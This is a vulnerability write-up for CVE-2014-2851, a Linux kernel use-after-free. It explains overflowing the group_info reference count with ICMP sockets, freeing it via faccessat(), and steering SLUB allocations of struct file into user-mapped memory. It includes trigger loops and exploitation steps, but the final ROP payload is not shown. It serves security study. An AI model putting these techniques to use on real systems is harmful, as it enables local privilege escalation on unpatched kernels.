This is a case study of the use-after-free vulnerability that was assigned CVE-2014-2851 and affected Linux kernels through 3.14.1. First of all, I'd like to thank Thomas for his help, the original write-up, and his GitHub PoC.
This bug might not be very practical (it takes a while to overflow a 32-bit integer) but it was an interesting vulnerability from an exploitation point of view. On our test system, the overall runtime to get # was just over 50 minutes :) There is a certain amount of indeterminism caused by RCU callbacks which makes the exploitation more difficult.
Our test system was 32-bit Ubuntu 14.04 LTS (3.13.0-24-generic kernel) SMP. First, we will describe the vulnerability and walk through its exploitation. We will then discuss the challenges encountered in exploiting this bug.
The vulnerable path shown below is reached when an ICMP socket is created. Note that even though standard users (on most Linux distributions) are not allowed to create ICMP sockets, no root privileges are required to reach the vulnerable code:
    int ping_init_sock(struct sock *sk)
    {
        struct net *net = sock_net(sk);
        kgid_t group = current_egid();
        struct group_info *group_info = get_current_groups();    [1]
        int i, j, count = group_info->ngroups;
        kgid_t low, high;

        inet_get_ping_group_range_net(net, &low, &high);
        if (gid_lte(low, group) && gid_lte(group, high))          [2]
            return 0;
        ...
The above path ([1] in particular) is reached when an ICMP socket is created in user space:
socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
The get_current_groups() function in [1] is defined as a macro in include/linux/cred.h:
    #define get_current_groups()                            \
    ({                                                      \
        struct group_info *__groups;                        \
        const struct cred *__cred;                          \
        __cred = current_cred();                            \
        __groups = get_group_info(__cred->group_info);      \    [3]
        __groups;                                           \
    })
In [3], the get_group_info() function atomically increments the group_info usage counter, which is defined as a signed integer:
    type = struct group_info {
        atomic_t usage;
        int ngroups;
        int nblocks;
        kgid_t small_block[32];
        kgid_t *blocks[];
    }

    typedef struct {
        int counter;
    } atomic_t;
Every time a new ICMP socket is created, the usage counter is incremented by one in [1]. However, for an unprivileged user the check at [2] fails and the function eventually returns an error without ever dropping this reference, so the usage counter is never decremented on this exit path. By repeatedly creating new ICMP sockets, we can therefore overflow this signed 32-bit integer until it wraps around to 0 (0xffffffff + 1 = 0).
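The wraparound can be illustrated with a small user-space model. This is only a sketch: refcount_model, leaky_get() and leaks_until_zero() are hypothetical names invented for illustration, and the counter is modelled as an unsigned 32-bit value so that the wrap is well defined in C.

```c
#include <stdint.h>

/* Hypothetical user-space stand-in for the group_info usage counter.
 * uint32_t carries the same bit pattern as the kernel's signed counter,
 * but its wraparound is well defined in C. */
struct refcount_model {
    uint32_t usage;
};

/* Models one ICMP socket creation attempt: a reference is taken in [1]
 * and never dropped again. */
static void leaky_get(struct refcount_model *r)
{
    r->usage++;
}

/* Number of leaked references needed to wrap the counter from `start`
 * back to 0 (arithmetic is modulo 2^32). */
static uint32_t leaks_until_zero(uint32_t start)
{
    return (uint32_t)(0u - start);
}
```

Starting from a counter value of 1, leaks_until_zero() reports 0xffffffff, which is why the overflow takes so long in practice.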
The group_info structure is shared among forked child processes. When the group usage counter becomes 0, there are a number of paths in the kernel that may free it. One such path discovered by Thomas is the faccessat() syscall:
    SYSCALL_DEFINE3(faccessat, int, dfd, const char __user *, filename, int, mode)
    {
        const struct cred *old_cred;
        struct cred *override_cred;
        int res;
        ...
        override_cred = prepare_creds();    [4]
        ...
    out:
        revert_creds(old_cred);
        put_cred(override_cred);            [5]
        return res;
In [4], a new struct cred is allocated; its usage counter (not to be confused with group_info->usage) is set to 1, and the group_info->usage counter is incremented by 1. The put_cred() in [5] then decrements the cred->usage counter and, if it reaches 0, calls __put_cred():
    static inline void put_cred(const struct cred *_cred)
    {
        struct cred *cred = (struct cred *) _cred;

        validate_creds(cred);
        if (atomic_dec_and_test(&(cred)->usage))
            __put_cred(cred);
    }
An important detail is that freeing the cred struct is implemented via RCU ([6]):
    void __put_cred(struct cred *cred)
    {
        ...
        BUG_ON(cred == current->cred);
        BUG_ON(cred == current->real_cred);

        call_rcu(&cred->rcu, put_cred_rcu);    [6]
    }
    EXPORT_SYMBOL(__put_cred);
The following shows the put_cred_rcu() callback function, which in turn calls put_group_info() in [7] to free the group_info struct when its usage counter becomes 0:
    static void put_cred_rcu(struct rcu_head *rcu)
    {
        struct cred *cred = container_of(rcu, struct cred, rcu);
        ...
        security_cred_free(cred);
        key_put(cred->session_keyring);
        key_put(cred->process_keyring);
        key_put(cred->thread_keyring);
        key_put(cred->request_key_auth);
        if (cred->group_info)
            put_group_info(cred->group_info);    [7]
        free_uid(cred->user);
        put_user_ns(cred->user_ns);
        kmem_cache_free(cred_jar, cred);
    }
The put_group_info() function is defined as a macro that decrements the group_info usage counter and, if it reaches 0, frees the allocated structure:
    #define put_group_info(group_info)                      \
    do {                                                    \
        if (atomic_dec_and_test(&(group_info)->usage))      \
            groups_free(group_info);                        \
    } while (0)
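To make the consequence concrete, here is a minimal user-space model of the get/put pair using C11 atomics. It is a sketch, not kernel code: group_info_model, model_get() and model_put() are hypothetical names, and the "free" is only recorded in a flag.

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical user-space model of the group_info reference count. */
struct group_info_model {
    atomic_int usage;
    bool freed;       /* set where the kernel would call groups_free() */
};

/* Models get_group_info(): take one reference. */
static void model_get(struct group_info_model *gi)
{
    atomic_fetch_add(&gi->usage, 1);
}

/* Models put_group_info(). atomic_fetch_sub() returns the previous
 * value, so "previous == 1" is equivalent to "the counter is now 0",
 * which is what atomic_dec_and_test() checks. */
static void model_put(struct group_info_model *gi)
{
    if (atomic_fetch_sub(&gi->usage, 1) == 1)
        gi->freed = true;
}
```

If the counter has wrapped to 0 while other credentials still point at the structure, a single model_get() followed by model_put() (the pattern seen in faccessat()) takes it from 0 to 1 and back to 0, and the object is released even though it is still in use.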
It should be obvious by now that it is possible to free the group_info struct by overflowing its usage counter to 0 and then calling faccessat() from user space:
    unsigned int i;

    // increment the counter close to 0xffffffff ((unsigned int)-10 = 0xfffffff6)
    for (i = 0; i < 0xfffffff6u; i++) {
        socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    }

    // increment the counter by 1 and try to free it
    for (i = 0; i < 100; i++) {
        socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
        faccessat(0, "/", R_OK, AT_EACCESS);
    }
The above code should overflow the usage counter and free the group_info struct. Since freeing this structure is implemented as an RCU call, there is a certain amount of indeterminism involved, which is discussed later in the "Challenges" section.
Once the group_info struct is freed, the SLUB allocator will link it into the freelist. There are a number of good resources online describing the implementation of the SLUB allocator and we are not going to discuss it here. It is sufficient to note that when an object is freed, it is put in the freelist and its first 4 bytes (on a 32-bit architecture) are overwritten with a pointer to the next free object in the slab. Hence, the first 4 bytes of the group_info struct will be overwritten with a valid kernel memory address. These first 4 bytes also hold the usage counter, so we can still increment this pointer by creating ICMP sockets.
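The overlap between the free pointer and the usage counter can be sketched in user space. The struct below is a hypothetical 32-bit layout model (the trailing blocks[] member is omitted), and model_slub_free() is an illustrative helper, not an allocator function.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical model of the 32-bit group_info layout described above. */
struct group_info32_model {
    uint32_t usage;            /* offset 0: shares storage with the free pointer */
    int32_t  ngroups;
    int32_t  nblocks;
    uint32_t small_block[32];
};

/* Models what happens on free: the allocator stores the address of the
 * next free object in the first 4 bytes of the freed object. */
static void model_slub_free(struct group_info32_model *obj, uint32_t next_free)
{
    memcpy(obj, &next_free, sizeof(next_free));
}
```

After model_slub_free(), reading obj->usage yields the "next free" address, and incrementing usage moves that pointer forward one byte at a time.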
There are two possible scenarios when group_info is freed:
- It is the last object in the freelist
- It is one of the free objects in the freelist
In the former case, the "next" free object pointer of our freed group_info will be set to NULL. We will concentrate on the latter case, where this pointer is set to the next free object in the slab (this was the most common case).
On our test system, the group_info struct is 140 bytes in size and is allocated in the generic kmalloc-192 cache. When a request to allocate an object of size 128-192 bytes is received (via kmalloc, kmem_cache_alloc, etc.), the SLUB allocator will traverse the freelist and allocate memory at the address that our overwritten "usage" counter points to.
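As a quick sanity check of these numbers, the following sketch recomputes the 140-byte size from a 32-bit layout model and maps it to a size class. The bucket list is an assumption about the generic kmalloc caches on a typical x86 configuration, and both names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical 32-bit layout model: three 4-byte integers plus 32 group
 * IDs of 4 bytes each. The flexible blocks[] member adds no size. */
struct group_info32_layout {
    int32_t  usage;
    int32_t  ngroups;
    int32_t  nblocks;
    uint32_t small_block[32];
};

/* Returns the smallest assumed kmalloc size class that fits `size`,
 * or 0 if it does not fit any class in this simplified list. */
static size_t kmalloc_bucket_model(size_t size)
{
    static const size_t buckets[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };
    for (size_t i = 0; i < sizeof(buckets) / sizeof(buckets[0]); i++) {
        if (size <= buckets[i])
            return buckets[i];
    }
    return 0;
}
```

With this model, sizeof(struct group_info32_layout) is 12 + 128 = 140 bytes, and kmalloc_bucket_model(140) returns 192.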
It is possible to "point" this address to user space by incrementing the usage counter further until it overflows and wraps around to a user-space address that we can mmap. For example, given a kernel address 0xf3XXXXXX, adding 0x10000000 results in the user-space address 0x03XXXXXX, which we can mmap. In summary, the exploitation procedure can be described as follows:
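The wraparound arithmetic can be checked with a few lines of C. This is a worked example only: the helper names are hypothetical, the sample address 0xf3a1b2c0 is made up, and the user/kernel boundary of 0xc0000000 assumes the common 3G/1G split on 32-bit x86.

```c
#include <stdint.h>

/* Increments needed to move a 32-bit counter from `current` to `target`.
 * Unsigned subtraction is modulo 2^32, so wraparound is handled. */
static uint32_t increments_needed(uint32_t current, uint32_t target)
{
    return target - current;
}

/* Assumption: 3G/1G split, so user space ends below 0xc0000000. */
static int is_user_address_model(uint32_t addr)
{
    return addr < 0xc0000000u;
}
```

For a freelist pointer of 0xf3a1b2c0, increments_needed(0xf3a1b2c0, 0x03a1b2c0) is 0x10000000, i.e. roughly 268 million additional socket creations.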
- Increment the group_info usage counter close to 0xffffffff by creating ICMP sockets
- Increment the usage counter by 1, try to free group_info via faccessat(), and repeat
- Once it is freed, the usage counter in group_info will be overwritten with a valid kernel memory address pointing to the next free object in the slab
- Keep incrementing the group_info usage counter (by creating more ICMP sockets) until it points to some user-space memory address
- Map this region (e.g., 0x3000000-0x4000000) in user space and memset it to 0
- Start allocating structure X (ideally containing function pointers) in kernel space that has the size 128-192 bytes
- The SLUB allocator will allocate this structure X at our user-space address in range 0x3000000-0x4000000
- If the structure X contains any function pointers, we can point these to our payload (ROP chain in our case)
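The mapping step from the list above might look roughly like the sketch below. map_zeroed_region() is a hypothetical helper; it passes the address as a hint rather than using MAP_FIXED, so it refuses to clobber an existing mapping and simply fails if the kernel places the region elsewhere.

```c
#define _DEFAULT_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>

/* Try to map `len` bytes of zeroed, writable memory exactly at `start`.
 * Returns the mapping, or NULL if it could not be placed there. */
static void *map_zeroed_region(uintptr_t start, size_t len)
{
    void *want = (void *)start;
    void *got = mmap(want, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    if (got == MAP_FAILED)
        return NULL;
    if (got != want) {
        /* The hint was not honoured: undo and report failure. */
        munmap(got, len);
        return NULL;
    }
    /* Anonymous mappings are already zero-filled; the memset mirrors the
     * step in the text and also touches every page. */
    memset(got, 0, len);
    return got;
}
```

A call such as map_zeroed_region(0x3000000, 0x1000000) would cover the example range 0x3000000-0x4000000.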
The structure X used in our exploit is struct file, which has the same size as group_info and contains a few function pointers (e.g., struct file_operations *f_op, or to be more precise, a pointer to a struct containing function pointers). The file structs can be allocated, for example, using the following code:
    for (i = 0; i < N; i++)
        fd = open("/etc/passwd", O_RDONLY);
If more than 1024 file descriptors are required, you can always fork another process and allocate more file structs.
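A slightly more careful version of that loop keeps the descriptors and stops at the per-process limit. This is a sketch for a single process only; open_many() and close_all() are hypothetical helpers, and forking additional processes is left out.

```c
#include <fcntl.h>
#include <unistd.h>

/* Open `path` read-only up to `max` times, storing descriptors in `fds`.
 * Stops early when open() fails (for example with EMFILE once the
 * descriptor limit is reached). Returns the number of open descriptors. */
static int open_many(const char *path, int *fds, int max)
{
    int n = 0;

    while (n < max) {
        int fd = open(path, O_RDONLY);
        if (fd < 0)
            break;
        fds[n++] = fd;
    }
    return n;
}

/* Close the first `n` descriptors stored in `fds`. */
static void close_all(const int *fds, int n)
{
    for (int i = 0; i < n; i++)
        close(fds[i]);
}
```

Each successful open() corresponds to one struct file allocation in the kernel, so the return value tells us how many were actually created before the limit was hit.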
Once this file struct is allocated in our user-space range 0x3000000-0x4000000, we can simply search this memory range for the first non-zero byte. This will be the beginning of our file struct:
    unsigned *p;
    struct file *f = NULL;

    // find the file struct
    for (p = (unsigned *)0x3000000; p < (unsigned *)0x4000000; p++) {
        if (*p) {
            f = (struct file *)p;
            break;
        }
    }
From this point onward, the rest of the exploitation procedure is quite trivial.
As mentioned in the "Exploitation" section, there is a certain amount of indeterminism caused by RCU callbacks. For example, ping_init_sock() followed by faccessat() in a loop may not be performed in that order. Ideally, we want the following order:
- Increment the group_info usage counter
- Check if the counter is 0 and free it via faccessat()
However, the RCU callbacks are often accumulated and executed in batches. The callback function "is called after all the CPUs in the system have gone through at least one 'quiescent' state (such as context switch, idle loop, or user code)". Hence, it is often the case that a number of ping_init_sock() calls are executed (overflowing the counter and incrementing it to > 0), followed by a number of RCU callbacks to put_cred_rcu(). This results in the group_info freeing path being skipped. However, we have found a way to order the aforementioned events of incrementing and checking the usage counter.
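The effect of batching can be reproduced with a toy simulation. This is a deliberately simplified model, not a description of the real RCU implementation: simulate_free() is a hypothetical function in which every loop iteration performs one socket() and one faccessat(), and deferred callbacks run only once `batch` of them are pending.

```c
#include <stdbool.h>
#include <stdint.h>

/* Returns true if the modelled usage counter ever hits 0 inside a
 * deferred callback, i.e. if group_info would have been freed. */
static bool simulate_free(uint32_t start, unsigned iterations, unsigned batch)
{
    uint32_t usage = start;
    unsigned pending = 0;

    for (unsigned i = 0; i < iterations; i++) {
        usage++;    /* socket(): reference leaked in ping_init_sock() */
        usage++;    /* faccessat(): prepare_creds() takes a reference */
        pending++;  /* put_cred(): the drop is deferred to a callback */

        if (pending == batch) {
            /* Run all queued put_cred_rcu() callbacks back to back. */
            while (pending > 0) {
                pending--;
                if (--usage == 0)
                    return true;
            }
        }
    }
    return false;
}
```

Starting at 0xffffffff, a batch size of 1 frees the object in the first iteration, whereas with a batch size of 2 the counter has already moved past the point where a decrement lands on 0 and the free never happens in this run.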
Another issue encountered while exploiting this vulnerability is related to the recovery phase. What would happen if another object is requested from the same slab? In this case, we can always set the "next" freelist pointer of our object to NULL. The allocator will then set the freelist pointer to NULL, which, in turn, will force the allocator to create a new slab and "forget" about the current slab.
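The idea behind this recovery step can be shown with a minimal freelist model. It is a sketch under simplifying assumptions: slab_model and model_alloc() are hypothetical, and a NULL return stands for the point where the real allocator would fall back to a fresh slab.

```c
#include <stddef.h>

/* A free object stores the address of the next free object in its
 * first word, as described for SLUB above. */
struct free_obj {
    struct free_obj *next;
};

/* Hypothetical single-slab model: just the head of the freelist. */
struct slab_model {
    struct free_obj *freelist;
};

/* Pop one object. The new freelist head is whatever the popped object
 * holds in its first word. */
static void *model_alloc(struct slab_model *s)
{
    struct free_obj *obj = s->freelist;

    if (obj == NULL)
        return NULL; /* the real allocator would set up a new slab here */
    s->freelist = obj->next;
    return obj;
}
```

If the first word of the object under our control is set to NULL, the freelist is empty after that object is handed out, and the remaining free objects of the old slab are no longer reachable through it.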
Now what if some object belonging to this particular slab is freed? This presented a real challenge and was handled by a post-exploitation LKM that fixes up the system.
In terms of practicality, this particular vulnerability is probably not ideal since it takes a while to overflow the 32-bit usage counter :) On our test system, the overall exploitation time was just over 50 minutes! However, it is quite reliable (even on SMP platforms) once group_info is freed.